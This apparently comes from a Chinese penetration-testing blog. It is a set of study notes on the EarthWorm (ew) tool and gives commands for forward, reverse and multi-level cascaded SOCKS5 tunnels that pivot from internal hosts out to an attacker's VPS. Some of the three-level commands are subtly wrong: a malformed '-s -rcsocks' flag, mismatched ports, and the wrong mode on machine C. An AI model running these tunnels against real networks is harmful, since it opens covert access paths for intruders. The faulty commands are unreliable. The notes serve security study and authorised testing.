首页 » 内网渗透 » 正文

【学习笔记】「SOCKS5代理」ew 正向、反向、多级级联

正向代理

file

反向代理

file

二级级联

情况①:内网B与公网A互通

          +------不---通-----+
          |                  |
A<------->B------->C<----->内  网
|                  |
+----不----通-------+

C【在本地建立socks5代理,端口为1080】:

ew_for_Win.exe -s ssocksd -l 1080

B【把来自外部的1090端口的流量转到内网C这台机器的1080端口上】:

ew_for_Win.exe -s lcx_tran -l 1090 -f Cip -g 1080

实质访问B的1090端口就相当于访问C的1080端口。

情况②:内网B可访问外网,但没外网IP

          +------不---通-----+
          |                  |
A<--------B------->C<----->内  网
|                  |
+----不----通-------+

A【把来自外部的1234端口的流量转到本地的1080端口上】:

ew_for_Win.exe -s lcx_listen -l 1080 -e 1234

C【在本地启动socks5代理并监听2345端口】:

./ew_for_Linux32 -s ssocksd -l 2345

B【把A的1234端口和C的2345端口进行绑定,即建立socks5通道】:

ew_for_Win.exe -s lcx_slave -d Aip -e 1234 -f Cip -g 2345

实质访问A的1080端口就相当于访问C的2345端口。

三级级联

官网例子:

  $ ./ew -s rcsocks -l 1080 -e 8888
  $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
  $ ./ew -s lcx_listen -l 9999 -e 7777
  $ ./ew -s rssocks -d 127.0.0.1 -e 7777

数据流向: SOCKS v5 -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks

3层:
你的VPS机器ew.exe -s -rcsocks -l 1080 -e 65533[第一执行]

机器A:ew.exe -s lcx_slave -d 公网VPS_ip地址 -e 1235 -f 机器B的IP -g 3456[第四执行]
机器B:ew.exe -s lcx_listen -l 3456 -e 1236[第二执行]
机器C:ew.exe -s rssocks -d 机器B的IP地址 -e 1236[第三执行]

或者写成:
3层
你的公网VPS机器
ew.exe -s lcx_listen -l 1080 -e 1235[第一执行]

机器A:ew.exe -s lcx_slave -d 公网vps地址 -e 1235 -f 机器B的地址 -g 3456[第四执行]
机器B:ew.exe -s lcx_listen -l 3456 -e 1236[第二执行]
机器C:ew.exe -s lcx_listen -d 机器B的ip地址 -e 1236[第三执行]

EW源码<可以自行修改>

https://github.com/zzhsec/xiaogongju

参考来源:
https://www.bodkin.ren/index.php/archives/677/
http://rootkiter.com/EarthWorm
https://klionsec.github.io/2017/08/05/ew-tunnel